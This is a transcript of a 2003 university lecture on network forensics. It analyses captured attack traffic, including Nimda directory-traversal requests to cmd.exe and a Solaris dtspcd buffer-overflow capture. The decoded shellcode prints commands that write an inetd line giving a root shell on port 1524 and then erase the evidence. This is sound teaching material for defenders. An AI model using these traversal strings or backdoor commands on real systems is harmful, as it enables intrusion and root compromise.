Lecture 25: Network Primer 7/17/2003 CSCE 590 Summer 2003.

Slides:



Advertisements
Similar presentations
AES Sub-Key Generation By Muhammad Naseem. Rotate Word 09CF4F3C.
Advertisements

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.
F4-analyzing Network-based evidence for a windows intrusion Dr. John P. Abraham Professor UTPA.
Guide to Network Defense and Countermeasures Second Edition
Internet Threat Briefing Stealth and Coordinated Probes and Attacks Shadow.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Scanning February 23, 2010 MIS 4600 – MBA © Abdou Illia.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
1 Some TCP/IP Basics....NFSDNSTELNETSMTPFTP UDPTCP IP and ICMP Ethernet, serial line,..etc. Application Layer Transport Layer Network Layer Low-level &
Tcpdump Tutorial EE122 Fall 2006 Dilip Antony Joseph, Vern Paxson, Sukun Kim.
Computer Security and Penetration Testing
Practical Networking. Introduction  Interfaces, network connections  Netstat tool  Tcpdump: Popular network debugging tool  Used to intercept and.
Lecture 24: Network Primer 7/16/2003 CSCE 590 Summer 2003.
ECE Prof. John A. Copeland fax Office: Klaus 3362.
Network Forensics Networking Basics Collecting Network-Based Evidence (NBE) Collection of Packets using Tools Windows Intrusion UNIX Intrusion.
Chapter 11 Phase 5: Covering Tracks and Hiding. Attrition Web Site  Contains an archive of Web vandalism attacks
Port Scanning.
Intrusion Protection Mark Shtern. Protection systems Firewalls Intrusion detection and protection systems Honeypots System Auditing.
1 Figure 5-4: Drivers of Performance Requirements: Traffic Volume and Complexity of Filtering Performance Requirements Traffic Volume (Packets per Second)
Step-by-Step Intrusion Detection using TCPdump SHADOW.
Snort The Lightweight Intrusion Detection System.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Honeypot and Intrusion Detection System
OS Hardening Justin Whitehead Francisco Robles. ECE Internetwork Security OS Hardening Installing kernel/software patches and configuring a system.
Intrusion Detection and Prevention. Objectives ● Purpose of IDS's ● Function of IDS's in a secure network design ● Install and use an IDS ● Customize.
CIS 450 – Network Security Chapter 3 – Information Gathering.
Advanced Unix 25 Oct 2005 An Introduction to IPsec.
1 Tutorial 6: Networking Utilities & Firewall. 2 Internet Control Message Protocol (ICMP) designed to compensate for the deficiencies of IP protocol.
Inetd...Server of Servers Looks at a number of ports Determines when a service is needed on any of those ports Calls the appropriate server Restarts new.
Linux Networking and Security
 FreeBSD firewalls › ipfw -- IP firewall and traffic shaper control program  ipfw(8) › ipf (IP Filter) - alters packet filtering lists for IP packet.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
CIS 450 – Network Security Chapter 5 – Session Hijacking.
CIS 450 – Network Security Chapter 14 – Specific Exploits for UNIX.
Verify that timestamps for debugging and logging messages has been enabled. Verify the severity level of events that are being captured. Verify that the.
Advanced Packet Analysis and Troubleshooting Using Wireshark 23AF
UPnP Buffer Overflow Demo This is a True Story …of what could happen.
AES Encryption FIPS 197, November 26, Bit Block Encryption Key Lengths 128, 192, 256 Number of Rounds Key Length Rounds Block.
CTC228 Nov Today... Catching up with group projects URLs and DNS Nmap Review for Test.
Unix network Services. Configuring a network interface In Unix there are essentially two commands that are used to enable TCP/IP. ifconfig route.
An Analysis of Using Reflectors for Distributed Denial-of- Service Attacks Paper by Vern Paxson.
COMP2322 Lab 1 Introduction to Wireshark Weichao Li Jan. 22, 2016.
Quiz 2 -> Exam Topics Fall Chapter 10a - Firewalls Simple Firewall - drops packets based on IP, port Stateful - Keeps track of connections, set.
Network Intrusion Detection System (NIDS)
or call for office visit,
Lecture 21: Network Primer 7/9/2003 CSCE 590 Summer 2003.
Anatomy of a Hack... statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd.
Network Devices and Firewalls Lesson 14. It applies to our class…
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Buffer Overflow Walk-Through
Project CTF Yeganeh Safaei Arizona State University
CITA 352 Chapter 5 Port Scanning.
The Linux Operating System
or call for office visit, or call Kathy Cheek,
or call for office visit,
Port Scanning (based on nmap tool)
Principles of Computer Security
Buffer Overflow Walk-Through
Combinations COURSE 3 LESSON 11-3
Network Services CSCI N321 – System and Network Administration
A Distributed DoS in Action
Network Services.
TCP/IP Networking An Example
Traffic Analysis– Wireshark Simple Example
Lecture 3: Secure Network Architecture
A Series of Slides in 5 Parts Movement 2. BFS
COEN 252 Computer Forensics
A Series of Slides in 5 Parts Movement 1. DFS
Race Condition Vulnerability
Presentation transcript:

Lecture 25: Network Primer 7/17/2003 CSCE 590 Summer 2003

WinNuke nuker.com > victim.edu.139: FP 0:3(3) ack 1 win 8760 urg 3 (DF)

And This? 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag

Bad Network Traffic in Other places Web logs Traffic monitoring graphs Firewall logs Intrusion detection systems Router syslogs I even see attempts against my SSH tunnels!

Slammer 02:06: > ms-sql-m: udp :06: > : icmp: udp port ms-sql-m unreachable [tos 0xc0]

Nimda [12/Apr/2002:12:01: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 – [12/Apr/2002:12:01: ] "GET /scripts/..%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -

Firewall Logs

Intrusion Detection Systems Lets us detect signatures inside packets It would be very hard to write a tcpdump filter for Nimda More versatile than tcpdump Tcpdump is more universal and quicker Tcpdump allows you to record all traffic, an IDS usually only records matches on signatures

Solaris dtspcd Attack Honeynet.org Scan of the Month Scan 20 Let’s just scan through the network capture with tcpdump and see what we see Then we’ll look at it with Ethereal

10:45: IP > : P 1:34(33) ack 1 win (DF) 0x a c6 d03d 01a0 0x0010 ac e06 17e0 fe2a 6e27 5f37 bfc2...f.....*n'_7.. 0x ebc 845d a 1ba7 dbc0..>..] x f 710d ?q x f6f d root. 0x :45: IP > :. ack 34 win <no p,nop,timestamp > (DF) 0x a f06 51ec ac x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48.=......_7...*nH 0x d a 003f `(} ?q. 0x0030 1ba7 dbc :45: IP > : P 1:68(67) ack 34 win (DF) 0x a f06 51a8 ac x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48.=......_7...*nH 0x cc a 003f `(V ?q# 0x0030 1ba7 dbc x f 2f2e f //.SP 0x f f C_AAAH_aqWg x a 7a79 3a53 756e 4f53 3a35 2e38.buzzy:SunOS:5.8 0x0070 3a73 756e :sun4u.

What did we see? Src address: Dst address: Target port: 6112 –Solaris Common Desktop Environment –Dtspcd: CDE Subprocess Control Service –network daemon that accepts requests from clients to execute commands and launch applications remotely –Runs as root –Usually spawned by inetd or xinetd in response to CDE client request

What else? In the first packet from attacker to victim, we see the word “root”. Hmmmm Then the victim starts answering back In the third packet it announces what operating system it is running and its architecture Going on…

10:46: IP > : P 1:1449(1448) ack 1 w in (DF) 0x dc a1ac c d03d 01a0 0x0010 ac e08 17e0 fee2 c115 5f66 192f...f _f./ 0x ebc e1e a 1ba7 dffb..> x f ?uH x e x c c c 0x c c c c 0x c c c c 0x c c c c 0x c c c c Etc …. Etc …. Cut here…. 0x04d0 801c c c c 0x04e0 801c c c c 0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e x e020 a c a c02a 2008.# *.. 0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8.*...#...#...#.. 0x0520 c023 ffec b 91d f62 696e.# /bin 0x0530 2f6b d f /ksh....-c..echo 0x e c6f 636b "ingreslock.str 0x d e6f eam.tcp.nowait.r 0x0560 6f6f f62 696e 2f d oot./bin/sh.sh.- 0x e2f 746d 702f 783b 2f f73 i">/tmp/x;/usr/s 0x e2f 696e d73 202f 746d bin/inetd.-s./tm 0x f 783b 736c b2f 6269 p/x;sleep.10;/bi 0x05a0 6e2f 726d 202d f74 6d70 2f n/rm.-f./tmp/x.A 0x05b AAAAAAAAAAAAAAAA 0x05c AAAAAAAAAAAAAAAA 0x05d AAAAAAAAAAAA

Now what did we see? Lots of “801C 4011”, cut out 67 lines of them We have here a Sparc NOP slide –An Intel x86 slide would have “90 90”s –Common technique in buffer-overflow attacks –Try to get exploited program to execute shell code as the program owner –Increases odds buffer overflow will execute exploit code without havig to figure out exact locations –If buffer overflow pointer lands in them, exploit code will eventually be run

What code will be run? If we read the shell code, we’d see that the following will be exec’ed: 1../bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i“>/tmp/x; 2./usr/sbin/inetd -s /tmp/x; 3.sleep 10; 4./bin/rm -f /tmp/x Line 1 uses a ksh to execute an echo command. The echo, writes a pre-formatted inetd line to a temp file, /tmp/x Line 2: runs inetd, using /tmp/x as its configuration Line 3: sleeps 10 seconds, make sure inetd is started Line 4: cleans up the evidence

The inetd Line What does the inetd line do? ingreslock stream tcp nowait root /bin/sh sh -i Ingreslock is TCP port 1524 This line opens up an interactive root shell when someone connects to TCP port 1524 Guess what happens a little later?

10:46: IP > : P 1:209(208) ack (DF) 0x a1cc d4 d03d 01a0 0x0010 ac e0c 05f4 fff fbb f %_... 0x ebc a 1ba7 e57b..>.P { 0x f 7ac8 756e 616d d61 3b6c 7320.?z.uname.-a;ls. 0x0040 2d6c 202f 636f f f l./core./var/dt 0x0050 2f74 6d70 2f e 6c6f 673b /tmp/DTSPCD.log; 0x d2f f 6c6f c2f PATH=/usr/local/ 0x e3a 2f f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f f e3a 2f n:/usr/sbin:/sbi 0x0090 6e3a 2f f f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a f 676e 752f e3b f usr/gnu/bin;expo 0x00b b f rt.PATH;echo."BD 0x00c a d66.PID(s):."`ps.-f 0x00d c d73 202f 746d ed|grep.'.-s./tm 0x00e0 702f c d p/x'|grep.-v.gre 0x00f0 707c b20 277b e p|awk.'{print.$2 0x0100 7d27 600a }'`.

10:46: IP > : P 1:209(208) ack (DF) 0x a1cc d4 d03d 01a0 0x0010 ac e0c 05f4 fff fbb f %_... 0x ebc a 1ba7 e57b..>.P { 0x f 7ac8 756e 616d d61 3b6c 7320.?z.uname.-a;ls. 0x0040 2d6c 202f 636f f f l./core./var/dt 0x0050 2f74 6d70 2f e 6c6f 673b /tmp/DTSPCD.log; 0x d2f f 6c6f c2f PATH=/usr/local/ 0x e3a 2f f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f f e3a 2f n:/usr/sbin:/sbi 0x0090 6e3a 2f f f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a f 676e 752f e3b f usr/gnu/bin;expo 0x00b b f rt.PATH;echo."BD 0x00c a d66.PID(s):."`ps.-f 0x00d c d73 202f 746d ed|grep.'.-s./tm 0x00e0 702f c d p/x'|grep.-v.gre 0x00f0 707c b20 277b e p|awk.'{print.$2 0x0100 7d27 600a }'`.

What happened here? Looks scripted. Why? 1.uname -a; 2.ls -l /core/var/dt/tmp/DTSPCD.log; 3.PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/s bin:/usr/ccs/bin:/usr/gnu/bin; 4.export PATH; 5.echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`

10:46: IP > : P 3:98(95) ack 209 win (DF) 0x aa f06 516e ac x0010 d03d 01a0 05f4 0e0c 5fbb 0119 fff7 80f5.=......_ x a 003f 7ae3..`($ ?z. 0x0030 1ba7 e58d e4f a7a SunOS.buzzy. 0x e e f Generic_1085 0x d e sun4u.spar 0x e57 2c55 6c d35 5f31 c.SUNW,Ultra-5_1 0x a 2f63 6f72 653a 204e 6f /core:.No.such 0x c f f.file.or.directo 0x a ry. 10:46: IP > : P 98:148(50) ack 209 win (DF) 0x aa f06 519a ac x0010 d03d 01a0 05f4 0e0c 5fbb 0178 fff7 80f5.=......_..x.... 0x ff a 003f 7aed..`( ?z. 0x0030 1ba7 e598 2f f64 742f 746d 702f..../var/dt/tmp/ 0x e6c 6f67 3a20 4e6f 2073 DTSPCD.log:.No.s 0x c65 206f uch.file.or.dire 0x f72 790a ctory. 10:46: IP > : P 148:164(16) ack 209 win (DF) 0x aa f06 51bb ac x0010 d03d 01a0 05f4 0e0c 5fbb 01aa fff7 80f5.=......_ x c a 003f 7b00..`(.R ?{. 0x0030 1ba7 e5a a BD.PID(s):.3 0x a 476.

The Output from the Commands 1.# SunOS buzzy 5.8 Generic_ sun4u sparc SUNW,Ultra-5_10 2./core: No such file or directory 3./var/dt/tmp/DTSPCD.log: No such file or directory 4.BD PID(s): 3476

Interactive Commands Let’s go to Ethereal for this part…

References

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.